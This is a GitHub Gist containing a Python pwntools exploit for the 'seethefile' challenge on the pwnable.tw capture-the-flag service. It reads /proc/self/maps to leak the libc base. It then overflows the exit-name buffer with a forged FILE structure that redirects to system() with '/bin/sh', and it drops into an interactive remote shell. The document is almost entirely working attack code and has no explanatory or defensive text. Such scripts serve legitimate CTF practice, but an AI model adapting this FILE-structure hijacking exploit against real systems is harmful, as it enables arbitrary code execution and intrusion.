Created
October 17, 2018 16:10
-
-
Save nirohfeld/80739c69e22ad8e8cf68b2b6aaf069c8 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
main = ELF('./seethefile') | |
libc = ELF('./libc_32.so.6') | |
addr = p32(0x8048a37) | |
filename_addr = p32(0x804B080) | |
name_addr = p32(0x804B260) | |
payload = '/bin/sh\x00' + 'C' * 4 + 'D' * 4 + 'E' * 4 + 'F' * 4 + 'G' * 4 + 'H' * 4 + name_addr + 'J' * 4 + 'K' * 4 + "\x00" * 100 | |
def inset_in_offset(payload, offset, length, data): | |
payload = payload[:offset] + data + payload[offset+length:] | |
return payload | |
#r = main.process(env={'LD_PRELOAD': libc.path}) | |
r = remote("chall.pwnable.tw",10200) | |
def open_file(file_name): | |
log.info('Opening file %s' % file_name) | |
r.sendlineafter(':', '1') | |
r.sendlineafter(':', file_name) | |
def read_file(): | |
log.info('Reading file') | |
r.sendlineafter(':', '2') | |
def write_file(): | |
log.info('Writing file') | |
r.sendlineafter(':', '3') | |
def close_file(): | |
log.info('Closing file') | |
r.sendlineafter(':', '4') | |
def exit_program(name): | |
log.info('Exiting program') | |
r.sendlineafter(':', '5') | |
r.sendlineafter(':', name) | |
def leak_libc(): | |
open_file("/proc/self/maps") | |
read_file() | |
write_file() | |
return int(r.recvuntil("----")[-21:-13], 16) + 0x1000 | |
def run(): | |
r_payload = "\x00" * 500 | |
raw_input('Press return to start') | |
libc_base = leak_libc() | |
system_addr = libc_base + libc.symbols['system'] | |
print "libc base", hex(libc_base) | |
r_payload = inset_in_offset(r_payload, 0x20, 4, name_addr) | |
bin_sh = "\x80\x80\x80\x80/;bin/sh\x00" | |
r_payload = inset_in_offset(r_payload, 0, len(bin_sh), bin_sh) | |
r_payload = inset_in_offset(r_payload, 0x94, 4, p32(0x804B260 + 0x100)) | |
r_payload = inset_in_offset(r_payload, 0x108, 4, p32(system_addr)) | |
print r_payload.encode("hex") | |
exit_program(r_payload) | |
r.interactive() | |
if __name__ == '__main__': | |
run() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment